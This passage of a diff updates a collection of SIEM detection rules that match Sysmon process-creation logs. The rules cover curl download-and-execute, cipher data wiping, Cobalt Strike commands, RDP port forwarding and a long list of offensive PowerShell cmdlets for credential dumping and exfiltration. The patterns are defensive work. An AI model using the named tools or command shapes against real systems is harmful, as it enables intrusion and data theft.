LIKE '% /domain:%' ESCAPE '\\' OR CommandLine LIKE '% /path:%' ESCAPE '\\' OR CommandLine LIKE '% /ca:%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" + "filename": "proc_creation_win_hktl_certify.yml" }, { - "title": "HackTool - CrackMapExec Execution Patterns", - "id": "058f4380-962d-40a5-afce-50207d36d7e2", - "status": "stable", - "description": "Detects various execution patterns of the CrackMapExec pentesting framework", - "author": "Thomas Patzke", + "title": "Stop Windows Service Via Net.EXE", + "id": "88872991-7445-4a22-90b2-a3adadb0e827", + "status": "experimental", + "description": "Detects the stopping of a Windows service", + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1053", - "attack.t1059.003", - "attack.t1059.001", - "attack.s0106" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Unknown" + "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. 
Filter legitimate activity accordingly" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('net.exe', 'net1.exe') OR (Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" + "filename": "proc_creation_win_net_stop_service.yml" }, { - "title": "SQL Client Tools PowerShell Session Detection", - "id": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", + "title": "Curl Download And Execute Combination", + "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", "status": "test", - "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", - "author": "Agro (@agro_sev) oscd.communitly", + "description": "Adversaries can use curl to download payloads remotely and execute them. 
Curl is included by default in Windows 10 build 17063 and later.", + "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1127" + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\sqltoolsps.exe' ESCAPE '\\') AND NOT (ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mssql_sqltoolsps_susp_execution.yml" + "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" }, { - "title": "Suspicious Encoded Obfuscated LOAD String", - "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", - "status": "test", - "description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for reflection.assembly load", - "author": "pH-T (Nextron Systems)", + "title": "DLL Sideloading by VMware Xfer Utility", + "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "status": "experimental", + "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", 
"attack.defense_evasion", - "attack.t1027" + "attack.t1574.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_load.yml" + "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" }, { - "title": "Adwind RAT / JRAT", - "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", - "status": "test", - "description": "Detects javaw.exe 
in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "Deleted Data Overwritten Via Cipher.EXE", + "id": "4b046706-5789-4673-b111-66f25fe99534", + "status": "experimental", + "description": "Detects usage of the \"cipher\" built-in utility in order to overwrite deleted data from disk.\nAdversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.impact", + "attack.t1485" ], - "level": "high", + "falsepositives": [ + "Unknown" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'CIPHER.EXE' OR Image LIKE '%\\\\cipher.exe' ESCAPE '\\') AND CommandLine LIKE '% /w:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_adwind.yml" + "filename": "proc_creation_win_cipher_overwrite_deleted_data.yml" }, { - "title": "Bypass UAC via Fodhelper.exe", - "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", - "status": "test", - "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "Operator Bloopers Cobalt Strike Commands", + "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", + "status": "experimental", + "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate use of fodhelper.exe utility by legitimate user" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_fodhelper.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" }, { - "title": "Potential Recon Activity Using Wevtutil", - "id": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", + "title": "Malicious PowerShell Commandlets - ProcessCreation", + "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", "status": "experimental", - "description": "Detects usage of the wevtutil utility to perform reconnaissance", + "description": "Detects Commandlet names 
from well-known PowerShell exploitation frameworks", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of the utility by administrators to query the event log" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '% qe %' ESCAPE '\\' OR CommandLine LIKE '% query-events %' ESCAPE '\\') AND (CommandLine LIKE '%Microsoft-Windows-TerminalServices-LocalSessionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Security%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADR%' ESCAPE '\\' OR CommandLine LIKE 
'%Export-ADRCSV%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRExcel%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRHTML%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRJSON%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRXML%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ADIDNS%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' 
OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE 
'%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR 
CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' 
ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%New-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wevtutil_recon.yml" + "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" }, { - "title": "Always Install Elevated Windows Installer", - "id": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", - "status": "experimental", - "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", + "id": 
"782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", + "status": "test", + "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "System administrator usage", - "Anti virus products" + "Legitimate administration activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND Image LIKE '%msi%' ESCAPE '\\' AND Image LIKE '%tmp' ESCAPE '\\') OR (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND IntegrityLevel = 'System')) AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\') OR ((ParentImage LIKE 'C:\\\\ProgramData\\\\Sophos\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\Avast Software\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\Google\\\\Update\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" ], - 
"filename": "proc_creation_win_susp_always_install_elevated_windows_installer.yml" + "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" }, { - "title": "Unusual Parent Process For Cmd.EXE", - "id": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", - "status": "experimental", - "description": "Detects suspicious parent process for cmd.exe", - "author": "Tim Rauch", + "title": "Suspicious Copy From or To System32", + "id": "fff9d2b7-e11c-4a69-93d3-40ef66189767", + "status": "test", + "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n", + "author": "Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Depend on scripts and administrative tools used in the 